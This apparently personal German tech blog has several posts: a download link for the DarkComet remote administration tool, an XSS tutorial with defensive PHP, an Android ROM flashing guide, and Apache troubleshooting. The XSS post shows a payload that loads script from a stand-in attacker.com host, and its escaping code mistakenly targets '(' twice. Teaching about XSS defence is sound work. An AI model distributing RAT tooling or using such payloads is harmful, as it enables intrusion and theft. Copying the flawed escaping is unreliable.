Dienstag, 24. Juli 2012

DarkComet Last Version v3.5.1 Download Alternative Link

The last official Version of the DarkComet RAT (Remote Administration Tool) is v3.5.1.
www.darkcomet-rat.com is not up anymore ...

Here is an alternative Download-Link for v3.5
http://www.mediafire.com/?jwxfcagn8mynnuc

Greetz

XSS Cross Site Scripting Verhindern und Verstehen Gegenmaßnahmen

XSS oder Cross Site Scripting ist eine Angriffs Methode auf WebApps die dazu führt,
dass ein Angreifer HTML/CSS oder JavaScript Code in die Website injizieren kann.


Es gibt 2 Arten von XSS Vulnerabilities ( = Verwundbarkeiten )
- Reflected bzw Non-Persistent XSS ( = reflektiertes / nicht beständiges XSS )
- Persistent XSS ( = beständiges XSS )






Persisten XSS:

Ein Angriffsbeispiel für Persistent XSS ist die Kommentarfunktion einer Internetseite.
Wenn dort zusätzlich zum Kommentar eine JavaScript Funktion angefügt wird, wird das JavaScript jedesmal ausgeführt wenn ein Website Besucher diesen Kommentar angezeigt bekommt.


Beispiel: Kommentar schreiben: | Beispielkommentar <script>alert("XSS Erfolgreich");</script> |
Neben dem Text Beispielkommentar wird noch der HTML Tag <script> angefügt, in dem JavaScript Code ausgeführt wird. In diesem Fall wird mit alert(); eine MessageBox aufgerufen die "XSS Erfolgreich" ausgibt.


Da dieser Kommentar immer angezeigt wird wenn die Kommentar Sektion der Website aufgerufen wird, bezeichnet man dieses XSS Beispiel als Persistent also beständig.






Reflected / Non-Persistent XSS:

Als reflektiertes bzw nicht beständiges Cross Site Scripting werden Angriffe bezeichnet,
die auf einen speziell preparierten Link angewiesen sind. Dazu werden die GET-Parameter manipuliert.


Beispiel: Suche | Hallo |
Sobald man die Suche abschickt wird man weitergeleitet auf zb. example.com/search.php?suche=Hallo
Der Suchbegriff, in diesem Fall "Hallo" wird via GET-Parameter an das PHP-Script search.php übergeben.
Die Ergebnisse werden ausgegeben und über den Ergebnissen steht zb " Suchergebnisse für 'Hallo'. "
Genau hier liegt der Ansatz für Reflected XSS.


Wenn der Suchbegriff "Hallo" erweitert wird zu "Hallo<script>alert("XSS");</script>
,dann wird beim Titel "Suchergebnisse für 'Hallo'." hinter dem Suchbegriff das JavaScript gestartet.


Weil dieser XSS-Angriff nur über die URL example.com/search.php?suche=Hallo<script>alert("XSS");</script> zu erreichen ist, muss der Link zb durch Email-Spreading (Phishing Mails) verbreitet werden, damit der Angriff jemanden erreicht.




Angriffsszenarien:

In den zwei Beispielen wurde jeweils nur eine MessageBox geöffnet.
Über eine XSS-Lücke kann man aber noch einiges mehr anstellen.
Fügt man anstatt <script>alert();</script> den Code 
<script src="attacker.com/xss-script.js"></script> ein,
wird eine JavaScript-Datei vom Webserver des Angreifers geladen und ausgeführt.


In dieser kann ein Angreifer jeden beliebige JavaScript Code ausführen.
Vom ersetzen des Seiteninhalts bis zum versteckten KeyLogger/MouseLogger ist hier so einiges möglich.


XSS-Angriffe sind nur so lange aktiv bis der Besucher die Seite wechselt, weil dann das infizierte JavaScript nicht mehr ausgeführt wird. Ein Angreiffer kann aber Gegenmaßnahmen ergreifen,
sodass bei allen weiteren Link-Aufrufen das JavaScript im Hintergrund weiterläuft.






Gegenmaßnahmen:

Hier zeige ich nun wie man XSS Verhindern kann mit PHP-Beispiel Code.

Ziel ist es die HTML Tags so zu verändern, dass diese bei der Ausgabe im Browser nicht mehr als HTML interpretiert werden.
Dazu gibt es HTML Entities (Hier eine Liste: http://unicode.e-workers.de/entities.php).


Wenn man beim <script> Tag das < und > zeichen als HTML Entity speichert bzw ausgibt
( < = &lt; und > = &gt; ), interpretiert der Browser den Input nicht mehr als HTML.


In PHP gibt es dazu die Methode htmlentities().
Als Beispiel die Suche:
<?php
$suchbegriff = htmlentities($_GET["suche"]);
... 
echo "Suchergebnisse für '" . $suchbegriff . "'.";
...
?>
Dadurch wird der Suchbegriff mit Entities maskiert und entschärft.


Zusätzlich ist zu empfehlen ")" und "(" zu maskieren, um Angriffe auf Events und Link Locations zu entschärfen.
<?php
$suchbegriff = htmlentities($_GET["suche"]);
$suchbegriff = strtr($suchbegriff, "(", "&#x0028;");
$suchbegriff = strtr($suchbegriff, "(",  "&#x0029;");
?>


Grundsätzlich gilt bei jedem Input den ein User in einer WebApplication machen kann gehören die Strings maskiert um XSS zu vermeiden. Das gilt für GET & POST - Daten.


Hoffe ich konnte ein bisschen weiter helfen!
Greetz

Sonntag, 27. Mai 2012

Mouse Lock (Pointer Lock) Example Code for Google Chrome

Theres an important feature coming up for HTML5 browsers: Mouse Lock.
It's still in beta status but you can activate it in the Chrome Browser under chrome://flags/.

Without Mouse Lock you can't really design an Ego-Shooter neither any First Person Game.

A Sample Implementation of Mouse Lock with jQuery:
> Pointer Lock Example <
Only Working in Chrome!

Theres an successful Port of a Quake 3 Map with WebGL and Mouse Lock. http://media.tojicode.com/q3bsp/

Freitag, 9. Dezember 2011

MIUI Flashen auf dem Galaxy S I9000

MIUI ist ein Android Custum ROM basierend auf dem CyonagenMod CustonROM. http://miuiandroid.com/


Es bietet viele Theme-Packs und Design/Style Möglichkeiten (zb Custom Bootloader, Icon Packs, Lockscreens) die über die mitgelieferte Themes App heruntergeladen werden können.


Dateien die benötigt werden:
http://j.mp/vjic5p ODIN3 v1.85
http://bit.ly/JuwKLN MIUI ROM immer neuste version
http://bit.ly/yRKTwI Speedmod Kernel k16 für Odin
( Updates gibts hier http://bit.ly/z8Xgkl )
http://j.mp/uAMvcy CyanogenMod Initial Kernel

Ich hafte nicht für mögliche Schäden oder einen Garantie Entfall !!
Mit dem MIUI ROM ist euer Gerät bereits gerootet
Dadurch entfällt die Garantie !!

Flashen mit ODIN:
ODIN ist eine Software von Samsung zum Flashen (installieren) neuer Betriebssysteme.
Zum Flashen mit ODIN muss das Galaxy S in den "Download Modus" versetzt werden. Dazu das Handy ausschalten, dann Volume Down + Home + Power - Button gleichzeitig gedrückt halten.



  • Wenn dann ein schaufelnder gelber Droide erscheint ist dein SGS im Download Modus
  • Wird stattdessen normal gestartet funktioniert die 3-Tastenkombination nicht. In diesem Fall gibt es die Möglichkeit einen JIG Reset Stecker zu kaufen ca 10€. Dieser startet das Handy automatisch in den Download Modus.



Wenn Samsung Kies auf dem PC mit dem geflasht wird noch nicht installiert ist, muss vor dem Flashen ein Samsung Treiber Package installiert werden.
(Treiber Windows 32 bit: http://bit.ly/vdbrXh)
(Treiber Windows 64 bit: http://bit.ly/u67kfp)


Wenn Samsung Kies installiert ist und läuft, beenden Sie es vor den Flashen !


SpeedMod-Kernel
Als erstes wird der SpeedMod Kernel geflasht. Dazu Odin als Administrator ausführen.
In Odin muss nur im Feld PDA die Datei speedmod-kernel-k16-10-Odin.tar eingebunden werden.






Wenn das Galaxy S im Download Modus bereits im Download Modus ist, stecken Sie es mit dem USB-Verbindungskabel an. Nun sollte in Odin links unten der Text Added !!! erscheinen.
Falls nicht:

  • Überprüfen ob Samsung Kies geschlossen ist
  • Odin neu starten
  • Samsung Treiber für Download-Modus installieren
  • Anderen USB Anschluss wählen
  • Das SGS neu in den Download-Modus starten
  • PC Neu starten

Wenn Added !!! erscheint, auf Start drücken, um den Flash-Vorgang zu starten.
Sollte in Odin links oben Failed ! steht, hat das Flashen nicht funktioniert.

In diesem Fall, den Akku raus und rein und wieder in den Download-Modus starten mit der 3Tasten-Kombination. Danach erneut Flashen.

Wenn der Flashvorgang erflogreich war, sollte in Odin Reset zu lesen sein.
Danach müsste das Galaxy S ganz normal mit dem vorhergehenden Android-System starten.



Recovery Menü
Um in das Recovery Menü zu kommen, muss mit der Tastenkombination Volume UP + Home + Power gestartet werden. Wie beim Download-Modus die Tasten für ca 4sek gedrückt halten. Dann sollte ein Menü mit blauer Schrift erscheinen.

Als erstes Wipen wir das Galaxy S um Daten von früheren Android Systemen zu löschen. Miui läuft dann sicherer und stabiler.
Im Recovery Menü Navigieren:

  • Down/Up mit Lautstärke Tasten
  • Auswählen mit Home oder Power
Im Recovery Menü mount and storage wählen und folgende Ordner formatieren:
  • system
  • cache
  • datadata
  • data



Danach mount USB storage auswählen und das Handy am PC anstecken. Jetzt sollte man auf die interne SD Karte wie auf einen USB-Stick zugreifen können.
Das MIUI Package miuiandroid_I9000-1.12.2.zip auf die interne SD kopieren.



Im Recovery +++ Go Back +++ drücken bis die oberste Menü Ebene zu sehen ist.
Jetzt noch wipe data/factory reset wählen und danach auf reboot system now drücken



Das erste Mal booten kann ca 5min dauern da es jetzt alle gewählten Ordner formatiert, danach sollte sich das SGS in einer Boot-Schleife befinden. Akku raus und rein um das Handy auszuschalten.







CyanogenMod Initial Kernel
Nachdem dem Speedmod Kernel muss mit Odin das CyanogenMod Basissystem geflasht werden.
Dazu Odin neu starten als Administrator und im Feld PDA die Datei cm7-galaxys-initial-kernel.tar auswählen.





Das Galaxy S jetzt wieder in den Download-Modus starten und an den PC Anschließen.
Wenn Added !!! erscheint auf Start drücken, ansonsten die Oben gezeigten Problem Lösungen versuchen. Jetzt Start drücken und warten.
Nachdem das Flashen fertig ist, startet das Handy immer wieder neu.
Einfach Akku raus und wieder rein um das Handy auszuschalten.


MIUI installieren
Nachdem der CM Initial Kernel erfogreich geflasht wurde müssen wir aus dem Download-Modus direkt in den Recovery Modus.
Die Tasten Volume UP + Home + Power solange drücken bis das Galaxy im Recovery Menü ist.

Im Menü den Punkt install zip from sdcard wählen und die MIUI Zip-Datei suchen und auswählen.
Danach wird MIUI installiert und das Galaxy neu gestartet.


Jetzt sollte MIUI auf eurem Samsung Galaxy S booten.


        Viel Spaß mit MIUI !

Mittwoch, 16. November 2011

Apache startet nicht Prozess System blockiert Port 80

Hatte heute dass Problem dass der Apache Dienst unter XAMPP nicht gestartet werden konnte.
Musste selbst lange Googlen bis ich wusste was das Problem war.
Apache bis kurz davor noch ohne Probleme funktioniert.

Bei mir lag es daran dass der Dienst "Webbereitstellungs-Agent-Dienst" aktiviert war.
Unter Dienste deaktivieren und Port 80 war bei mir wieder frei.

Aktiviert hat diesen Dienst wahrscheinlich Microsoft Webmatrix, HTML-Editior den ich kurz vorher ausprobiert habe. Der erstellt selbst einen Webserver und braucht diesen Dienst.

Wenn Port 80 immer noch belegt ist kann ein Programm den Port blockieren. (zb Teamviewer, Skype). Beenden und der Port sollte wieder frei sein...

Falls noch immer nicht:

in der cmd eigeben: netstat -aob


Ausgabe:
Prot. Lokale Adresse Remoteadresse Status PID

TCP 0.0.0.0:80 fredmair:0 ABHÖREN 4116
[httpd.exe]

TCP 0.0.0.0:135 fredmair:0 ABHÖREN 904
RpcSs
[svchost.exe]

TCP 0.0.0.0:443 fredmair:0 ABHÖREN 4116
[httpd.exe]

TCP 0.0.0.0:445 fredmair:0 ABHÖREN 4
Es konnten keine Besitzerinformationen abgerufen werden.


usw ...

Bei mir steht bei TCP 0.0.0.0:80 [httpd.exe] . Dass ist der Apache Server.
Dort steht dann evt. das Programm dass Port 80 blockiert.

Noch eine mögliche Lösung die ich gefunden habe:
Unter Systemsteuerung>Deinstallieren>Windows Funktionen aktivieren/deaktivieren
die Internetinformationsdienste komplett deaktivieren.

Hoffe es konnte jemandem helfen!